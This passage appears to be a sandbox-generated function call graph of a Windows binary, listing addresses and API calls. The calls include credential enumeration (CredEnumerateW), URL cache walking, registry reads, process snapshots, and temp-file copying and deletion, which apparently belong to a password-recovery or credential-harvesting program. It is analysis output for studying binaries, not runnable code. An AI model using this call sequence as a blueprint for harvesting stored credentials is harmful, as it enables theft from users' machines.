40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38070->38071 38110 40da80 38071->38110 38074->38052 38076 40dbb4 memset memset 38075->38076 38077 409bca GetModuleFileNameW 38076->38077 38077->38059 38080 4447f4 38078->38080 38079 40dc1b 38079->38062 38079->38063 38080->38079 38081 444807 ??2@YAPAXI 38080->38081 38082 44481f 38081->38082 38083 444873 _snwprintf 38082->38083 38084 4448ab wcscpy 38082->38084 38117 44474a 8 API calls 38083->38117 38086 4448bb 38084->38086 38118 44474a 8 API calls 38086->38118 38088 4448a7 38088->38084 38088->38086 38089 4448cd 38119 44474a 8 API calls 38089->38119 38091 4448e2 38120 44474a 8 API calls 38091->38120 38093 4448f7 38121 44474a 8 API calls 38093->38121 38095 44490c 38122 44474a 8 API calls 38095->38122 38097 444921 38123 44474a 8 API calls 38097->38123 38099 444936 38124 44474a 8 API calls 38099->38124 38101 44494b 38125 44474a 8 API calls 38101->38125 38103 444960 ??3@YAXPAX 38103->38079 38105 44db70 38104->38105 38106 40d702 memset GetPrivateProfileStringW 38105->38106 38107 40d752 38106->38107 38108 40d75c WritePrivateProfileStringW 38106->38108 38107->38108 38109 40d758 38107->38109 38108->38109 38109->38066 38111 44db70 38110->38111 38112 40da8d memset 38111->38112 38113 40daac LoadStringW 38112->38113 38114 40dac6 38113->38114 38114->38113 38116 40dade 38114->38116 38126 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38114->38126 38116->37888 38117->38088 38118->38089 38119->38091 38120->38093 38121->38095 38122->38097 38123->38099 38124->38101 38125->38103 38126->38114 38137 409b98 GetFileAttributesW 38127->38137 38129 40daea 38130 40db63 38129->38130 38131 40daef wcscpy wcscpy GetPrivateProfileIntW 38129->38131 38130->37890 38138 40d65d GetPrivateProfileStringW 38131->38138 38133 40db3e 38139 40d65d GetPrivateProfileStringW 38133->38139 38135 40db4f 38140 40d65d GetPrivateProfileStringW 38135->38140 38137->38129 38138->38133 38139->38135 38140->38130 38176 40eaff 38141->38176 38145 411ae2 memset 38144->38145 38146 411b8f 38144->38146 38216 409bca GetModuleFileNameW 38145->38216 38158 411a8b 38146->38158 38148 411b0a wcsrchr 38149 411b22 wcscat 38148->38149 38150 411b1f 38148->38150 38217 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38149->38217 38150->38149 38152 411b67 38218 402afb 38152->38218 38156 411b7f 38274 40ea13 SendMessageW memset SendMessageW 38156->38274 38159 402afb 27 API calls 38158->38159 38160 411ac0 38159->38160 38161 4110dc 38160->38161 38162 41113e 38161->38162 38167 4110f0 38161->38167 38299 40969c LoadCursorW SetCursor 38162->38299 38164 411143 38300 4032b4 38164->38300 38318 444a54 38164->38318 38165 4110f7 _wcsicmp 38165->38167 38166 411157 38168 40ada2 _wcsicmp 38166->38168 38167->38162 38167->38165 38321 410c46 10 API calls 38167->38321 38171 411167 38168->38171 38169 4111af 38171->38169 38172 4111a6 qsort 38171->38172 38172->38169 38175->37972 38177 40eb10 38176->38177 38189 40e8e0 38177->38189 38180 40eb6c memcpy memcpy 38181 40ebb7 38180->38181 38181->38180 38182 40ebf2 ??2@YAPAXI ??2@YAPAXI 38181->38182 38183 40d134 16 API calls 38181->38183 38184 40ec2e ??2@YAPAXI 38182->38184 38186 40ec65 38182->38186 38183->38181 38184->38186 38186->38186 38199 40ea7f 38186->38199 38188 402f49 38188->37972 38190 40e8f2 38189->38190 38191 40e8eb ??3@YAXPAX 38189->38191 38192 40e900 38190->38192 38193 40e8f9 ??3@YAXPAX 38190->38193 38191->38190 38194 40e911 38192->38194 38195 40e90a ??3@YAXPAX 38192->38195 38193->38192 38196 40e931 ??2@YAPAXI ??2@YAPAXI 38194->38196 38197 40e921 ??3@YAXPAX 38194->38197 38198 40e92a ??3@YAXPAX 38194->38198 38195->38194 38196->38180 38197->38198 38198->38196 38200 40aa04 ??3@YAXPAX 38199->38200 38201 40ea88 38200->38201 38202 40aa04 ??3@YAXPAX 38201->38202 38203 40ea90 38202->38203 38204 40aa04 ??3@YAXPAX 38203->38204 38205 40ea98 38204->38205 38206 40aa04 ??3@YAXPAX 38205->38206 38207 40eaa0 38206->38207 38208 40a9ce 4 API calls 38207->38208 38209 40eab3 38208->38209 38210 40a9ce 4 API calls 38209->38210 38211 40eabd 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40eac7 38212->38213 38214 40a9ce 4 API calls 38213->38214 38215 40ead1 38214->38215 38215->38188 38216->38148 38217->38152 38275 40b2cc 38218->38275 38220 402b0a 38221 40b2cc 27 API calls 38220->38221 38222 402b23 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402b3a 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402b54 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b6b 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b82 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b99 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402bb0 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402bc7 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bde 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402bf5 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402c0c 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402c23 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c3a 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c51 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c68 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c7f 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c99 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402cb3 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402cd5 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402cf0 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402d0b 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402d26 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d3e 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d59 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d78 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d93 38271->38272 38273 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38272->38273 38273->38156 38274->38146 38278 40b58d 38275->38278 38277 40b2d1 38277->38220 38279 40b5a4 GetModuleHandleW FindResourceW 38278->38279 38280 40b62e 38278->38280 38281 40b5c2 LoadResource 38279->38281 38282 40b5e7 38279->38282 38280->38277 38281->38282 38283 40b5d0 SizeofResource LockResource 38281->38283 38282->38280 38291 40afcf 38282->38291 38283->38282 38285 40b608 memcpy 38294 40b4d3 memcpy 38285->38294 38287 40b61e 38295 40b3c1 18 API calls 38287->38295 38289 40b626 38296 40b04b 38289->38296 38292 40b04b ??3@YAXPAX 38291->38292 38293 40afd7 ??2@YAPAXI 38292->38293 38293->38285 38294->38287 38295->38289 38297 40b051 ??3@YAXPAX 38296->38297 38298 40b05f 38296->38298 38297->38298 38298->38280 38299->38164 38301 4032c4 38300->38301 38302 40b633 ??3@YAXPAX 38301->38302 38303 403316 38302->38303 38322 44553b 38303->38322 38307 403480 38518 40368c 15 API calls 38307->38518 38309 403489 38310 40b633 ??3@YAXPAX 38309->38310 38311 403495 38310->38311 38311->38166 38312 4033a9 memset memcpy 38313 4033ec wcscmp 38312->38313 38314 40333c 38312->38314 38313->38314 38314->38307 38314->38312 38314->38313 38516 4028e7 11 API calls 38314->38516 38517 40f508 6 API calls 38314->38517 38316 403421 _wcsicmp 38316->38314 38319 444a64 FreeLibrary 38318->38319 38320 444a83 38318->38320 38319->38320 38320->38166 38321->38167 38323 445548 38322->38323 38324 445599 38323->38324 38519 40c768 38323->38519 38325 4455a8 memset 38324->38325 38331 4457f2 38324->38331 38602 403988 38325->38602 38334 445854 38331->38334 38705 403e2d memset memset memset memset memset 38331->38705 38385 4458aa 38334->38385 38728 403c9c memset memset memset memset memset 38334->38728 38335 445672 38613 403fbe memset memset memset memset memset 38335->38613 38336 4458bb memset memset 38338 414c2e 16 API calls 38336->38338 38337 4455e5 38337->38335 38347 44560f 38337->38347 38341 4458f9 38338->38341 38340 44595e memset memset 38345 414c2e 16 API calls 38340->38345 38346 40b2cc 27 API calls 38341->38346 38343 445a00 memset memset 38751 414c2e 38343->38751 38344 445b22 38350 445bca 38344->38350 38351 445b38 memset memset memset 38344->38351 38355 44599c 38345->38355 38356 445909 38346->38356 38358 4087b3 338 API calls 38347->38358 38348 44557a 38382 44558c 38348->38382 38800 41366b FreeLibrary 38348->38800 38349 445849 38815 40b1ab ??3@YAXPAX ??3@YAXPAX 38349->38815 38357 445c8b memset memset 38350->38357 38424 445cf0 38350->38424 38360 445bd4 38351->38360 38361 445b98 38351->38361 38364 40b2cc 27 API calls 38355->38364 38366 409d1f 6 API calls 38356->38366 38369 414c2e 16 API calls 38357->38369 38367 445621 38358->38367 38359 44589f 38816 40b1ab ??3@YAXPAX ??3@YAXPAX 38359->38816 38375 414c2e 16 API calls 38360->38375 38361->38360 38371 445ba2 38361->38371 38368 4459ac 38364->38368 38365 403335 38515 4452e5 45 API calls 38365->38515 38378 445919 38366->38378 38801 4454bf 20 API calls 38367->38801 38380 409d1f 6 API calls 38368->38380 38381 445cc9 38369->38381 38888 4099c6 wcslen 38371->38888 38372 4456b2 38803 40b1ab ??3@YAXPAX ??3@YAXPAX 38372->38803 38374 40b2cc 27 API calls 38386 445a4f 38374->38386 38388 445be2 38375->38388 38376 445d3d 38409 40b2cc 27 API calls 38376->38409 38377 445d88 memset memset memset 38392 414c2e 16 API calls 38377->38392 38817 409b98 GetFileAttributesW 38378->38817 38379 445823 38379->38349 38391 4087b3 338 API calls 38379->38391 38393 4459bc 38380->38393 38394 409d1f 6 API calls 38381->38394 38586 444b06 38382->38586 38383 445879 38383->38359 38404 4087b3 338 API calls 38383->38404 38385->38336 38410 44594a 38385->38410 38766 409d1f wcslen wcslen 38386->38766 38389 40b2cc 27 API calls 38388->38389 38398 445bf3 38389->38398 38391->38379 38401 445dde 38392->38401 38884 409b98 GetFileAttributesW 38393->38884 38403 445ce1 38394->38403 38395 445bb3 38891 445403 memset 38395->38891 38396 445680 38396->38372 38636 4087b3 memset 38396->38636 38408 409d1f 6 API calls 38398->38408 38399 445928 38399->38410 38818 40b6ef 38399->38818 38411 40b2cc 27 API calls 38401->38411 38908 409b98 GetFileAttributesW 38403->38908 38404->38383 38407 40b2cc 27 API calls 38416 445a94 38407->38416 38418 445c07 38408->38418 38419 445d54 _wcsicmp 38409->38419 38410->38340 38423 4459ed 38410->38423 38422 445def 38411->38422 38412 4459cb 38412->38423 38432 40b6ef 252 API calls 38412->38432 38771 40ae18 38416->38771 38417 44566d 38417->38331 38687 413d4c 38417->38687 38428 445389 258 API calls 38418->38428 38429 445d71 38419->38429 38494 445d67 38419->38494 38421 445665 38802 40b1ab ??3@YAXPAX ??3@YAXPAX 38421->38802 38430 409d1f 6 API calls 38422->38430 38423->38343 38423->38344 38424->38365 38424->38376 38424->38377 38425 445389 258 API calls 38425->38350 38434 445c17 38428->38434 38909 445093 23 API calls 38429->38909 38437 445e03 38430->38437 38432->38423 38433 4456d8 38439 40b2cc 27 API calls 38433->38439 38440 40b2cc 27 API calls 38434->38440 38436 44563c 38436->38421 38442 4087b3 338 API calls 38436->38442 38910 409b98 GetFileAttributesW 38437->38910 38438 40b6ef 252 API calls 38438->38365 38444 4456e2 38439->38444 38445 445c23 38440->38445 38441 445d83 38441->38365 38442->38436 38804 413fa6 _wcsicmp _wcsicmp 38444->38804 38449 409d1f 6 API calls 38445->38449 38447 445e12 38454 445e6b 38447->38454 38460 40b2cc 27 API calls 38447->38460 38452 445c37 38449->38452 38450 445aa1 38453 445b17 38450->38453 38468 445ab2 memset 38450->38468 38481 409d1f 6 API calls 38450->38481 38778 40add4 38450->38778 38783 445389 38450->38783 38792 40ae51 38450->38792 38451 4456eb 38456 4456fd memset memset memset memset 38451->38456 38457 4457ea 38451->38457 38458 445389 258 API calls 38452->38458 38885 40aebe 38453->38885 38912 445093 23 API calls 38454->38912 38805 409c70 wcscpy wcsrchr 38456->38805 38808 413d29 38457->38808 38464 445c47 38458->38464 38465 445e33 38460->38465 38462 445e7e 38467 445f67 38462->38467 38470 40b2cc 27 API calls 38464->38470 38471 409d1f 6 API calls 38465->38471 38476 40b2cc 27 API calls 38467->38476 38472 40b2cc 27 API calls 38468->38472 38474 445c53 38470->38474 38475 445e47 38471->38475 38472->38450 38473 409c70 2 API calls 38477 44577e 38473->38477 38478 409d1f 6 API calls 38474->38478 38911 409b98 GetFileAttributesW 38475->38911 38480 445f73 38476->38480 38482 409c70 2 API calls 38477->38482 38483 445c67 38478->38483 38485 409d1f 6 API calls 38480->38485 38481->38450 38486 44578d 38482->38486 38487 445389 258 API calls 38483->38487 38484 445e56 38484->38454 38490 445e83 memset 38484->38490 38488 445f87 38485->38488 38486->38457 38493 40b2cc 27 API calls 38486->38493 38487->38350 38915 409b98 GetFileAttributesW 38488->38915 38492 40b2cc 27 API calls 38490->38492 38495 445eab 38492->38495 38496 4457a8 38493->38496 38494->38365 38494->38438 38497 409d1f 6 API calls 38495->38497 38498 409d1f 6 API calls 38496->38498 38499 445ebf 38497->38499 38500 4457b8 38498->38500 38501 40ae18 9 API calls 38499->38501 38807 409b98 GetFileAttributesW 38500->38807 38511 445ef5 38501->38511 38503 4457c7 38503->38457 38505 4087b3 338 API calls 38503->38505 38504 40ae51 9 API calls 38504->38511 38505->38457 38506 445f5c 38508 40aebe FindClose 38506->38508 38507 40add4 2 API calls 38507->38511 38508->38467 38509 40b2cc 27 API calls 38509->38511 38510 409d1f 6 API calls 38510->38511 38511->38504 38511->38506 38511->38507 38511->38509 38511->38510 38513 445f3a 38511->38513 38913 409b98 GetFileAttributesW 38511->38913 38914 445093 23 API calls 38513->38914 38515->38314 38516->38316 38517->38314 38518->38309 38520 40c775 38519->38520 38916 40b1ab ??3@YAXPAX ??3@YAXPAX 38520->38916 38522 40c788 38917 40b1ab ??3@YAXPAX ??3@YAXPAX 38522->38917 38524 40c790 38918 40b1ab ??3@YAXPAX ??3@YAXPAX 38524->38918 38526 40c798 38527 40aa04 ??3@YAXPAX 38526->38527 38528 40c7a0 38527->38528 38919 40c274 memset 38528->38919 38533 40a8ab 9 API calls 38534 40c7c3 38533->38534 38535 40a8ab 9 API calls 38534->38535 38536 40c7d0 38535->38536 38948 40c3c3 38536->38948 38540 40c7e5 38541 40c877 38540->38541 38542 40c86c 38540->38542 38548 40c634 49 API calls 38540->38548 38973 40a706 38540->38973 38549 40bdb0 38541->38549 38990 4053fe 39 API calls 38542->38990 38548->38540 39158 404363 38549->39158 38552 40bf5d 39178 40440c 38552->39178 38554 40bdee 38554->38552 38557 40b2cc 27 API calls 38554->38557 38555 40bddf CredEnumerateW 38555->38554 38558 40be02 wcslen 38557->38558 38558->38552 38560 40be1e 38558->38560 38559 40be26 _wcsncoll 38559->38560 38560->38552 38560->38559 38563 40be7d memset 38560->38563 38564 40bea7 memcpy 38560->38564 38565 40bf11 wcschr 38560->38565 38566 40b2cc 27 API calls 38560->38566 38568 40bf43 LocalFree 38560->38568 39181 40bd5d 28 API calls 38560->39181 39182 404423 38560->39182 38563->38560 38563->38564 38564->38560 38564->38565 38565->38560 38567 40bef6 _wcsnicmp 38566->38567 38567->38560 38567->38565 38568->38560 38569 4135f7 39195 4135e0 38569->39195 38572 40b2cc 27 API calls 38573 41360d 38572->38573 38574 40a804 8 API calls 38573->38574 38575 413613 38574->38575 38576 41361b 38575->38576 38577 41363e 38575->38577 38578 40b273 27 API calls 38576->38578 38579 4135e0 FreeLibrary 38577->38579 38580 413625 GetProcAddress 38578->38580 38581 413643 38579->38581 38580->38577 38582 413648 38580->38582 38581->38348 38583 413658 38582->38583 38584 4135e0 FreeLibrary 38582->38584 38583->38348 38585 413666 38584->38585 38585->38348 39198 4449b9 38586->39198 38589 444c1f 38589->38324 38590 4449b9 42 API calls 38592 444b4b 38590->38592 38591 444c15 38594 4449b9 42 API calls 38591->38594 38592->38591 39219 444972 GetVersionExW 38592->39219 38594->38589 38595 444b99 memcmp 38600 444b8c 38595->38600 38596 444c0b 39223 444a85 42 API calls 38596->39223 38600->38595 38600->38596 39220 444aa5 42 API calls 38600->39220 39221 40a7a0 GetVersionExW 38600->39221 39222 444a85 42 API calls 38600->39222 38603 40399d 38602->38603 39224 403a16 38603->39224 38605 403a09 39238 40b1ab ??3@YAXPAX ??3@YAXPAX 38605->39238 38607 403a12 wcsrchr 38607->38337 38608 4039a3 38608->38605 38611 4039f4 38608->38611 39235 40a02c CreateFileW 38608->39235 38611->38605 38612 4099c6 2 API calls 38611->38612 38612->38605 38614 414c2e 16 API calls 38613->38614 38615 404048 38614->38615 38616 414c2e 16 API calls 38615->38616 38617 404056 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 404073 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 40408e 38620->38621 38622 409d1f 6 API calls 38621->38622 38623 4040a6 38622->38623 38624 403af5 20 API calls 38623->38624 38625 4040ba 38624->38625 38626 403af5 20 API calls 38625->38626 38627 4040cb 38626->38627 39265 40414f memset 38627->39265 38629 404140 39279 40b1ab ??3@YAXPAX ??3@YAXPAX 38629->39279 38631 4040ec memset 38634 4040e0 38631->38634 38632 404148 38632->38396 38633 4099c6 2 API calls 38633->38634 38634->38629 38634->38631 38634->38633 38635 40a8ab 9 API calls 38634->38635 38635->38634 39292 40a6e6 WideCharToMultiByte 38636->39292 38638 4087ed 39293 4095d9 memset 38638->39293 38641 408953 38641->38396 38642 408809 memset memset memset memset memset 38643 40b2cc 27 API calls 38642->38643 38644 4088a1 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088b1 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088c0 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 4088d0 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 4088df 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 4088ef 38653->38654 38655 40b2cc 27 API calls 38654->38655 38656 4088fe 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 40890e 38657->38658 38659 40b2cc 27 API calls 38658->38659 38660 40891d 38659->38660 38661 409d1f 6 API calls 38660->38661 38662 40892d 38661->38662 39312 409b98 GetFileAttributesW 38662->39312 38664 40893e 38665 408943 38664->38665 38666 408958 38664->38666 39313 407fdf 75 API calls 38665->39313 39314 409b98 GetFileAttributesW 38666->39314 38669 408964 38670 408969 38669->38670 38671 40897b 38669->38671 38688 40b633 ??3@YAXPAX 38687->38688 38689 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38688->38689 38690 413f00 Process32NextW 38689->38690 38691 413da5 OpenProcess 38690->38691 38692 413f17 CloseHandle 38690->38692 38693 413df3 memset 38691->38693 38699 413eb0 38691->38699 38692->38433 39614 413f27 38693->39614 38695 413ebf ??3@YAXPAX 38695->38699 38696 413e1f 38700 413e37 GetModuleHandleW 38696->38700 38702 413e6a QueryFullProcessImageNameW 38696->38702 39619 413959 38696->39619 39635 413ca4 38696->39635 38697 4099f4 3 API calls 38697->38699 38699->38690 38699->38695 38699->38697 38700->38696 38701 413e46 GetProcAddress 38700->38701 38701->38696 38702->38696 38704 413ea2 CloseHandle 38704->38699 38706 414c2e 16 API calls 38705->38706 38707 403eb7 38706->38707 38708 414c2e 16 API calls 38707->38708 38709 403ec5 38708->38709 38710 409d1f 6 API calls 38709->38710 38711 403ee2 38710->38711 38712 409d1f 6 API calls 38711->38712 38713 403efd 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403f15 38714->38715 38716 403af5 20 API calls 38715->38716 38717 403f29 38716->38717 38718 403af5 20 API calls 38717->38718 38719 403f3a 38718->38719 38720 40414f 33 API calls 38719->38720 38721 403f4f 38720->38721 38722 403faf 38721->38722 38724 403f5b memset 38721->38724 38726 4099c6 2 API calls 38721->38726 38727 40a8ab 9 API calls 38721->38727 39649 40b1ab ??3@YAXPAX ??3@YAXPAX 38722->39649 38724->38721 38725 403fb7 38725->38379 38726->38721 38727->38721 38729 414c2e 16 API calls 38728->38729 38730 403d26 38729->38730 38731 414c2e 16 API calls 38730->38731 38732 403d34 38731->38732 38733 409d1f 6 API calls 38732->38733 38734 403d51 38733->38734 38735 409d1f 6 API calls 38734->38735 38736 403d6c 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d84 38737->38738 38739 403af5 20 API calls 38738->38739 38740 403d98 38739->38740 38741 403af5 20 API calls 38740->38741 38742 403da9 38741->38742 38743 40414f 33 API calls 38742->38743 38744 403dbe 38743->38744 38745 403e1e 38744->38745 38746 403dca memset 38744->38746 38749 4099c6 2 API calls 38744->38749 38750 40a8ab 9 API calls 38744->38750 39650 40b1ab ??3@YAXPAX ??3@YAXPAX 38745->39650 38746->38744 38748 403e26 38748->38383 38749->38744 38750->38744 38752 414b81 9 API calls 38751->38752 38753 414c40 38752->38753 38754 414c73 memset 38753->38754 39651 409cea 38753->39651 38756 414c94 38754->38756 39654 414592 RegOpenKeyExW 38756->39654 38758 414c64 38758->38374 38760 414cc1 38761 414cf4 wcscpy 38760->38761 39655 414bb0 wcscpy 38760->39655 38761->38758 38763 414cd2 39656 4145ac RegQueryValueExW 38763->39656 38765 414ce9 RegCloseKey 38765->38761 38767 409d62 38766->38767 38768 409d43 wcscpy 38766->38768 38767->38407 38769 409719 2 API calls 38768->38769 38770 409d51 wcscat 38769->38770 38770->38767 38772 40aebe FindClose 38771->38772 38773 40ae21 38772->38773 38774 4099c6 2 API calls 38773->38774 38775 40ae35 38774->38775 38776 409d1f 6 API calls 38775->38776 38777 40ae49 38776->38777 38777->38450 38779 40ade0 38778->38779 38780 40ae0f 38778->38780 38779->38780 38781 40ade7 wcscmp 38779->38781 38780->38450 38781->38780 38782 40adfe wcscmp 38781->38782 38782->38780 38784 40ae18 9 API calls 38783->38784 38790 4453c4 38784->38790 38785 40ae51 9 API calls 38785->38790 38786 4453f3 38788 40aebe FindClose 38786->38788 38787 40add4 2 API calls 38787->38790 38789 4453fe 38788->38789 38789->38450 38790->38785 38790->38786 38790->38787 38791 445403 253 API calls 38790->38791 38791->38790 38793 40ae7b FindNextFileW 38792->38793 38794 40ae5c FindFirstFileW 38792->38794 38795 40ae94 38793->38795 38796 40ae8f 38793->38796 38794->38795 38798 40aeb6 38795->38798 38799 409d1f 6 API calls 38795->38799 38797 40aebe FindClose 38796->38797 38797->38795 38798->38450 38799->38798 38800->38382 38801->38436 38802->38417 38803->38417 38804->38451 38806 409c89 38805->38806 38806->38473 38807->38503 38809 413d39 38808->38809 38810 413d2f FreeLibrary 38808->38810 38811 40b633 ??3@YAXPAX 38809->38811 38810->38809 38812 413d42 38811->38812 38813 40b633 ??3@YAXPAX 38812->38813 38814 413d4a 38813->38814 38814->38331 38815->38334 38816->38385 38817->38399 38819 44db70 38818->38819 38820 40b6fc memset 38819->38820 38821 409c70 2 API calls 38820->38821 38822 40b732 wcsrchr 38821->38822 38823 40b743 38822->38823 38824 40b746 memset 38822->38824 38823->38824 38825 40b2cc 27 API calls 38824->38825 38826 40b76f 38825->38826 38827 409d1f 6 API calls 38826->38827 38828 40b783 38827->38828 39657 409b98 GetFileAttributesW 38828->39657 38830 40b792 38831 40b7c2 38830->38831 38832 409c70 2 API calls 38830->38832 39658 40bb98 38831->39658 38834 40b7a5 38832->38834 38836 40b2cc 27 API calls 38834->38836 38840 40b7b2 38836->38840 38837 40b837 FindCloseChangeNotification 38839 40b83e memset 38837->38839 38838 40b817 39691 409a45 GetTempPathW 38838->39691 39694 40a6e6 WideCharToMultiByte 38839->39694 38843 409d1f 6 API calls 38840->38843 38843->38831 38844 40b827 CopyFileW 38844->38839 38845 40b866 38846 444432 121 API calls 38845->38846 38847 40b879 38846->38847 38848 40bad5 38847->38848 38849 40b273 27 API calls 38847->38849 38850 40baeb 38848->38850 38851 40bade DeleteFileW 38848->38851 38852 40b89a 38849->38852 38853 40b04b ??3@YAXPAX 38850->38853 38851->38850 38854 438552 134 API calls 38852->38854 38855 40baf3 38853->38855 38856 40b8a4 38854->38856 38855->38410 38857 40bacd 38856->38857 38859 4251c4 137 API calls 38856->38859 38858 443d90 111 API calls 38857->38858 38858->38848 38882 40b8b8 38859->38882 38860 40bac6 39704 424f26 123 API calls 38860->39704 38861 40b8bd memset 39695 425413 17 API calls 38861->39695 38864 425413 17 API calls 38864->38882 38867 40a71b MultiByteToWideChar 38867->38882 38868 40a734 MultiByteToWideChar 38868->38882 38871 40b9b5 memcmp 38871->38882 38872 4099c6 2 API calls 38872->38882 38873 404423 37 API calls 38873->38882 38876 40bb3e memset memcpy 39705 40a734 MultiByteToWideChar 38876->39705 38877 4251c4 137 API calls 38877->38882 38879 40bb88 LocalFree 38879->38882 38882->38860 38882->38861 38882->38864 38882->38867 38882->38868 38882->38871 38882->38872 38882->38873 38882->38876 38882->38877 38883 40ba5f memcmp 38882->38883 39696 4253ef 16 API calls 38882->39696 39697 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38882->39697 39698 4253af 17 API calls 38882->39698 39699 4253cf 17 API calls 38882->39699 39700 447280 memset 38882->39700 39701 447960 memset memcpy memcpy memcpy 38882->39701 39702 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38882->39702 39703 447920 memcpy memcpy memcpy 38882->39703 38883->38882 38884->38412 38886 40aed1 38885->38886 38887 40aec7 FindClose 38885->38887 38886->38344 38887->38886 38889 4099d7 38888->38889 38890 4099da memcpy 38888->38890 38889->38890 38890->38395 38892 40b2cc 27 API calls 38891->38892 38893 44543f 38892->38893 38894 409d1f 6 API calls 38893->38894 38895 44544f 38894->38895 39797 409b98 GetFileAttributesW 38895->39797 38897 44545e 38898 445476 38897->38898 38899 40b6ef 252 API calls 38897->38899 38900 40b2cc 27 API calls 38898->38900 38899->38898 38901 445482 38900->38901 38902 409d1f 6 API calls 38901->38902 38903 445492 38902->38903 39798 409b98 GetFileAttributesW 38903->39798 38905 4454a1 38906 4454b9 38905->38906 38907 40b6ef 252 API calls 38905->38907 38906->38425 38907->38906 38908->38424 38909->38441 38910->38447 38911->38484 38912->38462 38913->38511 38914->38511 38915->38494 38916->38522 38917->38524 38918->38526 38920 414c2e 16 API calls 38919->38920 38921 40c2ae 38920->38921 38991 40c1d3 38921->38991 38926 40c3be 38943 40a8ab 38926->38943 38927 40afcf 2 API calls 38928 40c2fd FindFirstUrlCacheEntryW 38927->38928 38929 40c3b6 38928->38929 38930 40c31e wcschr 38928->38930 38931 40b04b ??3@YAXPAX 38929->38931 38932 40c331 38930->38932 38933 40c35e FindNextUrlCacheEntryW 38930->38933 38931->38926 38934 40a8ab 9 API calls 38932->38934 38933->38930 38935 40c373 GetLastError 38933->38935 38938 40c33e wcschr 38934->38938 38936 40c3ad FindCloseUrlCache 38935->38936 38937 40c37e 38935->38937 38936->38929 38939 40afcf 2 API calls 38937->38939 38938->38933 38940 40c34f 38938->38940 38941 40c391 FindNextUrlCacheEntryW 38939->38941 38942 40a8ab 9 API calls 38940->38942 38941->38930 38941->38936 38942->38933 39085 40a97a 38943->39085 38946 40a8cc 38946->38533 38947 40a8d0 7 API calls 38947->38946 39090 40b1ab ??3@YAXPAX ??3@YAXPAX 38948->39090 38950 40c3dd 38951 40b2cc 27 API calls 38950->38951 38952 40c3e7 38951->38952 39091 414592 RegOpenKeyExW 38952->39091 38954 40c3f4 38955 40c50e 38954->38955 38956 40c3ff 38954->38956 38970 405337 38955->38970 38957 40a9ce 4 API calls 38956->38957 38958 40c418 memset 38957->38958 39092 40aa1d 38958->39092 38961 40c471 38963 40c47a _wcsupr 38961->38963 38962 40c505 RegCloseKey 38962->38955 38964 40a8d0 7 API calls 38963->38964 38965 40c498 38964->38965 38966 40a8d0 7 API calls 38965->38966 38967 40c4ac memset 38966->38967 38968 40aa1d 38967->38968 38969 40c4e4 RegEnumValueW 38968->38969 38969->38962 38969->38963 39094 405220 38970->39094 38974 4099c6 2 API calls 38973->38974 38975 40a714 _wcslwr 38974->38975 38976 40c634 38975->38976 39151 405361 38976->39151 38979 40c65c wcslen 39154 4053b6 39 API calls 38979->39154 38980 40c71d wcslen 38980->38540 38982 40c677 38983 40c713 38982->38983 39155 40538b 39 API calls 38982->39155 39157 4053df 39 API calls 38983->39157 38986 40c6a5 38986->38983 38987 40c6a9 memset 38986->38987 38988 40c6d3 38987->38988 39156 40c589 43 API calls 38988->39156 38990->38541 38992 40ae18 9 API calls 38991->38992 38998 40c210 38992->38998 38993 40ae51 9 API calls 38993->38998 38994 40c264 38995 40aebe FindClose 38994->38995 38997 40c26f 38995->38997 38996 40add4 2 API calls 38996->38998 39003 40e5ed memset memset 38997->39003 38998->38993 38998->38994 38998->38996 38999 40c231 _wcsicmp 38998->38999 39000 40c1d3 35 API calls 38998->39000 38999->38998 39001 40c248 38999->39001 39000->38998 39016 40c084 22 API calls 39001->39016 39004 414c2e 16 API calls 39003->39004 39005 40e63f 39004->39005 39006 409d1f 6 API calls 39005->39006 39007 40e658 39006->39007 39017 409b98 GetFileAttributesW 39007->39017 39009 40e667 39010 40e680 39009->39010 39011 409d1f 6 API calls 39009->39011 39018 409b98 GetFileAttributesW 39010->39018 39011->39010 39013 40e68f 39014 40c2d8 39013->39014 39019 40e4b2 39013->39019 39014->38926 39014->38927 39016->38998 39017->39009 39018->39013 39040 40e01e 39019->39040 39021 40e593 39023 40e5b0 39021->39023 39024 40e59c DeleteFileW 39021->39024 39022 40e521 39022->39021 39063 40e175 39022->39063 39025 40b04b 